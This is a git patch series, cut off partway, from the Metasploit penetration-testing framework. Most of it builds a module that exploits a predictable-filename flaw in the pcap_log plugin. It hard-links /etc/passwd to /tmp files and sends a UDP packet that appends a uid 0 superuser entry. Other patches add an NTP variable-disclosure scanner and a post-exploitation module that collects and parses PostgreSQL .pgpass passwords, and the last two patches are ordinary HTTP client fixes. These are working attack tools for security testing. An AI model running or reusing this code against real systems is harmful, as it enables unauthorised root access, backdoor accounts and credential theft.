From d148acdce3c4a0968622933ecd6e25feec8c20f2 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Sat, 21 Jul 2012 12:18:43 +0100 Subject: [PATCH 01/64] added exploit for metasploit pcap_log prov-esc --- .../post/multi/escalate/metasploit_pcaplog.rb | 102 ++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 modules/post/multi/escalate/metasploit_pcaplog.rb diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb new file mode 100644 index 0000000000..92537dd465 --- /dev/null +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -0,0 +1,102 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/local/linux_kernel' +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/local/unix' + +load 'lib/msf/core/post/common.rb' +load 'lib/msf/core/post/file.rb' +load 'lib/msf/core/exploit/local/unix.rb' +load 'lib/msf/core/exploit/local/linux.rb' + +class Metasploit3 < Msf::Post + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Common + + include Msf::Exploit::Local::Linux + include Msf::Exploit::Local::Unix + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Metasploit pcap_log Local Privilege Escalation', + 'Description' => %q{ + Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, + creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these + filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. + This, and all the other packets, are appended to /etc/passwd. + + Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'. + + This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. + }, + 'License' => MSF_LICENSE, + 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], + 'Platform' => [ 'linux','unix','bsd' ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'References' => + [ + [ 'BID', '54472' ], + [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], + [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ], + ], + 'DisclosureDate' => "Jul 16 2012", + 'Targets' => + [ + [ 'Linux/Unix Universal', {} ], + ], + 'DefaultTarget' => 0, + } + )) + register_options( + [ + Opt::RPORT(2940) + ], self) + end + + def run + print_status "Waiting for victim" + initial_size = cmd_exec("cat /etc/passwd | wc -l") + i = 60 + while(true) do + if (i == 60) then + # 0a2940: cmd_exec is slow, so send 1 command to do all the links + cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") + i = 0 + end + i = i+1 + if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then + # PCAP is flowing + pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" + print_status("Sending file contents payload to #{session.session_host}") + udpsock = Rex::Socket::Udp.create( + { + 'Context' => {'Msf' => framework, 'MsfExploit'=>self} + }) + udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + break + end + sleep(1) + end + + if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + then + print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.") + else + print_error("Failed. You should manually verify the 'metasploit' user has not been added") + end + # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload + # However beceause the session is not a terminal, su will not always allow this. + end +end From 176f6ea41e66e036ef05a137442d076c49fa45c1 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Sun, 5 Aug 2012 18:20:44 +0200 Subject: [PATCH 02/64] added USERNAME and PASSWORD as options --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 92537dd465..268d18a472 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Post filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. This, and all the other packets, are appended to /etc/passwd. - Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'. + Successful exploitation results in the creation of a new superuser account. This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. }, @@ -60,8 +60,10 @@ class Metasploit3 < Msf::Post } )) register_options( - [ - Opt::RPORT(2940) + [ + Opt::RPORT(2940), + OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) ], self) end @@ -78,7 +80,7 @@ class Metasploit3 < Msf::Post i = i+1 if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then # PCAP is flowing - pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" + pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { @@ -99,4 +101,4 @@ class Metasploit3 < Msf::Post # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end +end \ No newline at end of file From f5b3886e8cff7ac30754da73dfaeac3d9749ab54 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Mon, 6 Aug 2012 10:41:55 +0200 Subject: [PATCH 03/64] fix success/fail print statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 268d18a472..c4a22596e3 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") then - print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.") + print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else - print_error("Failed. You should manually verify the 'metasploit' user has not been added") + print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. From f728d32f60e59e7df2fbc5b2586bf8ffda7ab136 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:14:45 +0200 Subject: [PATCH 04/64] code style improvement - remove 'then' from 'if's --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index c4a22596e3..87afaf301c 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Post initial_size = cmd_exec("cat /etc/passwd | wc -l") i = 60 while(true) do - if (i == 60) then + if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 - if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then + if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Post end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") - then print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") From f48f77c0d7a53ea032460fec147559c0417d84c5 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:19:00 +0200 Subject: [PATCH 05/64] compatibility improvement - backticks not $() For the comments above, and the fact we're using backticks later in the line also (uniformity++) --- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 87afaf301c..0c2bd28476 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post while(true) do if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links - cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") + cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 From 733f656b004b487edc748c261a8e80483000f18f Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:32:10 +0200 Subject: [PATCH 06/64] code style improvement - start counter at 0 --- modules/post/multi/escalate/metasploit_pcaplog.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 0c2bd28476..8853855a68 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -70,14 +70,12 @@ class Metasploit3 < Msf::Post def run print_status "Waiting for victim" initial_size = cmd_exec("cat /etc/passwd | wc -l") - i = 60 + i = 0 while(true) do - if (i == 60) + if (i == 0) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") - i = 0 end - i = i+1 if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" @@ -89,7 +87,8 @@ class Metasploit3 < Msf::Post udpsock.sendto(pkt, session.session_host, datastore['RPORT']) break end - sleep(1) + sleep(1) # wait a second + i = (i+1) % 60 # increment second counter end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") From cbce2c0fd57b58f2861666585acc36249c46d0d4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 17 Oct 2012 17:30:30 -0500 Subject: [PATCH 07/64] Loop management, timeouts, and verbosity Add a todo for cred recording. Allow the user to determine when to give up. Changes while true to simply loop. Clear up some of the boolean checks. Inform the user what's going on. --- .../post/multi/escalate/metasploit_pcaplog.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8853855a68..52feb3c0b1 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -20,7 +20,7 @@ load 'lib/msf/core/exploit/local/unix.rb' load 'lib/msf/core/exploit/local/linux.rb' class Metasploit3 < Msf::Post - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Post::File include Msf::Post::Common @@ -63,28 +63,40 @@ class Metasploit3 < Msf::Post [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), - OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), + OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5]) ], self) end + def normalize_minutes + datastore["MINUTES"].abs rescue 0 + end + def run - print_status "Waiting for victim" + print_status "Setting up the victim's /tmp dir" initial_size = cmd_exec("cat /etc/passwd | wc -l") + print_status "/etc/passwd is currently #{initial_size} lines long" i = 0 - while(true) do + j = 0 + loop do if (i == 0) + j += 1 + break if j >= datastore['MINUTES'] + 1 # Give up after X minutes # 0a2940: cmd_exec is slow, so send 1 command to do all the links + print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})" cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") end - if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) + current_size = cmd_exec("cat /etc/passwd | wc -l") + if current_size == initial_size # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" - print_status("Sending file contents payload to #{session.session_host}") + vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { 'Context' => {'Msf' => framework, 'MsfExploit'=>self} }) - udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + res = udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + else break end sleep(1) # wait a second @@ -93,10 +105,11 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") + # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end \ No newline at end of file +end From 4d80e37741c001dd0ccb264689bfc0ad2c825a71 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Thu, 18 Oct 2012 20:03:28 -0300 Subject: [PATCH 08/64] NTP Clock Variables Disclosure --- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 67 ++++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 modules/auxiliary/scanner/ntp/ntp_readvar.rb diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb new file mode 100644 index 0000000000..34cbd132f9 --- /dev/null +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -0,0 +1,67 @@ +##### + + +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + + include Msf::Exploit::Remote::Udp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NTP Clock Variables Disclosure', + 'Description' => %q{ + This module reads the system internal NTP variables. These variables contain potentially sensitive + information, such as the NTP software version, operating system version, peers, and more.. + }, + 'Author' => 'Ewerson Guimaraes(Crash) ', + 'License' => MSF_LICENSE, + 'Version' => '', + 'References' => + [ + ['URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ], + ] + ) + ) + register_options( + [ + Opt::RPORT(123) + ], self.class) + end + + def run_host(ip) + + connect_udp + + readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" #readvar command + print_status("Connecting target #{rhost}:#{rport}...") + + print_status("Sending command") + udp_sock.put(readvar) + reply = udp_sock.recvfrom(65535, 0.1) + p_reply =( reply[0].split(",")) + arr_count = 0 + while ( arr_count < p_reply.size) + if arr_count == 0 + print_good (p_reply[arr_count].slice(12,p_reply[arr_count].size)) #12 is the adjustment of packet garbage + arr_count = arr_count + 1 + else + print_good (p_reply[arr_count].strip) + arr_count = arr_count + 1 + end + end + disconnect_udp + + end + +end \ No newline at end of file From 6d5da1662be2ba6c3004bbf9819a0da21665d980 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 10:55:48 +0200 Subject: [PATCH 09/64] Update modules/post/multi/escalate/metasploit_pcaplog.rb Stance is now passive --- modules/post/multi/escalate/metasploit_pcaplog.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 52feb3c0b1..3d06100110 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -56,6 +56,7 @@ class Metasploit3 < Msf::Post [ [ 'Linux/Unix Universal', {} ], ], + 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, } )) From 32ddd981ebade16bb8e23b3e4a9763c23b9086d3 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 10:58:09 +0200 Subject: [PATCH 10/64] linux_kernel mixin not required --- modules/post/multi/escalate/metasploit_pcaplog.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3d06100110..8502b2e075 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -10,7 +10,6 @@ require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' -require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' From 2f0c2d76eacf8c8e3ba64904f1b7a68891fa1839 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 11:01:26 +0200 Subject: [PATCH 11/64] remove load statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8502b2e075..64cdea7f19 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -13,11 +13,6 @@ require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' -load 'lib/msf/core/post/common.rb' -load 'lib/msf/core/post/file.rb' -load 'lib/msf/core/exploit/local/unix.rb' -load 'lib/msf/core/exploit/local/linux.rb' - class Metasploit3 < Msf::Post Rank = ManualRanking From 3746a3ef6490bfe7cc10c05ec984e8fcc8192600 Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Thu, 25 Oct 2012 21:30:54 -0500 Subject: [PATCH 12/64] adding pgpass_creds post module --- modules/post/multi/gather/pgpass_creds.rb | 112 ++++++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/post/multi/gather/pgpass_creds.rb diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb new file mode 100644 index 0000000000..74ac36f48b --- /dev/null +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -0,0 +1,112 @@ +require 'msf/core' +require 'rex' +require 'msf/core/post/file' +require 'msf/core/post/common' +require 'msf/core/post/unix' +require 'msf/core/post/windows/user_profiles' + +class Metasploit3 < Msf::Post + + include Msf::Post::File + include Msf::Post::Common + include Msf::Post::Unix + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super( update_info(info, + 'Name' => 'Multi Gather pgpass Credentials', + 'Description' => %q{ + This module will collect the contents of user's .pgpass or pgpass.conf and + parse them for credentials. This module is largely based on firefox_creds.rb and + ssh_creds.rb. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Zach Grace '], + 'Platform' => %w[linux bsd unix osx windows], + 'SessionTypes' => %w[meterpreter shell] + )) + end + + def run + print_status("Finding pgpass creds") + + files = [] + case session.platform + when /unix|linux|bsd|osx/ + files = enum_user_directories.map {|d| d + "/.pgpass"}.select { |f| file?(f) } + when /win/ + if session.type != "meterpreter" + print_error("Only meterpreter sessions are supported on windows hosts") + return + end + + grab_user_profiles.select do |user| + f = "#{user['AppData']}\\postgresql\\pgpass.conf" + if user['AppData'] && file?(f) + files << f + end + end + else + print_error("Unsupported platform #{session.platform}") + return + end + + if files.nil? || files.empty? + print_error("No users found with a .pgpass or pgpass.conf file") + return + end + + files.each do |f| + # Store the loot + print_good("Downloading #{f}") + store_loot("pgpass.#{f}", "text/plain", session, read_file(f), "#{f}", "pgpass #{f} File") + # Store the creds + parse_creds(f) + end + end + + # Store the creds to + def parse_creds(f) + read_file(f).each_line do |entry| + ip, port, db, user, pass = entry.chomp.split(/:/, 5) + + # Fix for some weirdness that happens with backslashes + p = "" + bs = false + pass.split(//).each do |c| + if c == "\\" + if bs == false + bs = true + p << c + else + # second backslash ignore + bs = false + end + else + if c == ":" && bs == true + p = "#{p[0,p.length-1]}:" + else + p << c + end + end + end + + pass = p + print_good("Retrieved postgres creds #{ip}:#{port}/#{db} #{user}:#{pass}") + + cred_hash = { + host: session.session_host, + port: port, + user: user, + pass: pass, + ptype: "password", + sname: "postgres", + source_type: "Cred", + duplicate_ok: true, + active: true + } + + report_auth_info(cred_hash) + end + end +end From 43fe219a052ce05018c2c563727c4026ab5adc42 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 28 Oct 2012 22:57:18 -0500 Subject: [PATCH 13/64] This improves handling of 100-continue responses --- lib/rex/proto/http/client.rb | 88 +++++++++++++++++----------------- lib/rex/proto/http/packet.rb | 6 +++ lib/rex/proto/http/response.rb | 17 +++++++ 3 files changed, 68 insertions(+), 43 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index c4af6d77d4..4d35a010b4 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -195,8 +195,7 @@ class Client # - cookie: Cookie header value # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ # - data: HTTP data (only useful with some methods, see rfc2616) - # - encode: URI encode the supplied URI, default: false - # - encode_params: URI encode the GET or POST variables (names and values), default: true + # - encode: URI encode the supplied URI # - headers: HTTP headers as a hash, e.g. { "X-MyHeader" => "value" } # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET # - proto: protocol, default: HTTP @@ -209,28 +208,28 @@ class Client # - vhost: Host header value # def request_cgi(opts={}) - c_enc = opts['encode'] || false - c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_cgi = opts['uri'] || '/' - c_body = opts['data'] || '' - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' - c_qs = opts['query'] || '' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_head = opts['headers'] || config['headers'] || {} - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] - c_conn = opts['connection'] - c_path = opts['path_info'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body + c_enc = opts['encode'] || false + c_cgi = opts['uri'] || '/' + c_body = opts['data'] || '' + c_meth = opts['method'] || 'GET' + c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' + c_qs = opts['query'] || '' + c_varg = opts['vars_get'] || {} + c_varp = opts['vars_post'] || {} + c_head = opts['headers'] || config['headers'] || {} + c_rawh = opts['raw_headers']|| config['raw_headers'] || '' + c_type = opts['ctype'] || 'application/x-www-form-urlencoded' + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] + c_conn = opts['connection'] + c_path = opts['path_info'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' + + uri = set_cgi(c_cgi) + qstr = c_qs + pstr = c_body if (config['pad_get_params']) 1.upto(config['pad_get_params_count'].to_i) do |i| @@ -243,27 +242,25 @@ class Client c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) + qstr << set_encode_uri(var) qstr << '=' - qstr << (c_enc_p ? set_encode_uri(val) : val) + qstr << set_encode_uri(val) end if (config['pad_post_params']) 1.upto(config['pad_post_params_count'].to_i) do |i| - rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) - rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) + pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) pstr << '=' - pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) + pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) end end c_varp.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(var) : var) + pstr << set_encode_uri(var) pstr << '=' - pstr << (c_enc_p ? set_encode_uri(val) : val) + pstr << set_encode_uri(val) end req = '' @@ -297,7 +294,6 @@ class Client req << set_chunked_header() req << set_raw_headers(c_rawh) req << set_body(pstr) - req end @@ -365,7 +361,7 @@ class Client # # Read a response from the server # - def read_response(t = -1) + def read_response(t = -1, opts = {}) resp = Response.new resp.max_data = config['read_max_data'] @@ -392,7 +388,7 @@ class Client ########################################################################## # XXX: NOTE: BUG: get_once currently (as of r10042) rescues "Exception" - # As such, the following rescue block will ever be reached. -jjd + # As such, the following rescue block will never be reached. -jjd ########################################################################## # Handle unexpected disconnects @@ -434,14 +430,20 @@ class Client return resp if not resp # As a last minute hack, we check to see if we're dealing with a 100 Continue here. - if resp.proto == '1.1' and resp.code == 100 - # If so, our real response becaome the body, so we re-parse it. - body = resp.body - resp = Response.new - resp.max_data = config['read_max_data'] - rv = resp.parse(body) - # XXX: At some point, this may benefit from processing post-completion code - # as seen above. + # Most of the time this is handled by the parser via check_100() + if resp.proto == '1.1' and resp.code == 100 and not opts[:skip_100] + # Read the real response from the body if we found one + # If so, our real response became the body, so we re-parse it. + if resp.body.to_s =~ /^HTTP/ + body = resp.body + resp = Response.new + resp.max_data = config['read_max_data'] + rv = resp.parse(body) + # We found a 100 Continue but didn't read the real reply yet + # Otherwise reread the reply, but don't try this hack again + else + resp = read_response(t, :skip_100 => true) + end end resp diff --git a/lib/rex/proto/http/packet.rb b/lib/rex/proto/http/packet.rb index d814523745..cd46e4ea45 100644 --- a/lib/rex/proto/http/packet.rb +++ b/lib/rex/proto/http/packet.rb @@ -367,6 +367,7 @@ protected if (self.body_bytes_left == 0) self.bufq.sub!(/^\r?\n/s,'') self.state = ParseState::Completed + self.check_100 return end @@ -396,10 +397,15 @@ protected # ready to go. if (not self.transfer_chunked and self.body_bytes_left == 0) self.state = ParseState::Completed + self.check_100 return end end + # Override this as needed + def check_100 + end + end end diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb index 1d7414e310..0bdf36f061 100644 --- a/lib/rex/proto/http/response.rb +++ b/lib/rex/proto/http/response.rb @@ -53,6 +53,9 @@ class Response < Packet # default chunk sizes (if chunked is used) self.chunk_min_size = 1 self.chunk_max_size = 10 + + # 100 continue counter + self.count_100 = 0 end # @@ -66,6 +69,19 @@ class Response < Packet else raise RuntimeError, "Invalid response command string", caller end + + check_100() + end + + # + # Allow 100 Continues to be ignored by the caller + # + def check_100 + # If this was a 100 continue with no data, reset + if self.code == 100 and (self.body_bytes_left == -1 or self.body_bytes_left == 0) and self.count_100 < 5 + self.reset_except_queue + self.count_100 += 1 + end end # @@ -84,6 +100,7 @@ class Response < Packet attr_accessor :code attr_accessor :message attr_accessor :proto + attr_accessor :count_100 end end From adc9532ec70fae9e436e888226ce195a07e75eb3 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 28 Oct 2012 23:13:32 -0500 Subject: [PATCH 14/64] Reset this back to master's copy, fixes this pull --- lib/rex/proto/http/client.rb | 62 +++++++++++++++++++----------------- 1 file changed, 33 insertions(+), 29 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 4d35a010b4..0572ea02ff 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -195,7 +195,8 @@ class Client # - cookie: Cookie header value # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ # - data: HTTP data (only useful with some methods, see rfc2616) - # - encode: URI encode the supplied URI + # - encode: URI encode the supplied URI, default: false + # - encode_params: URI encode the GET or POST variables (names and values), default: true # - headers: HTTP headers as a hash, e.g. { "X-MyHeader" => "value" } # - method: HTTP method to use in the request, not limited to 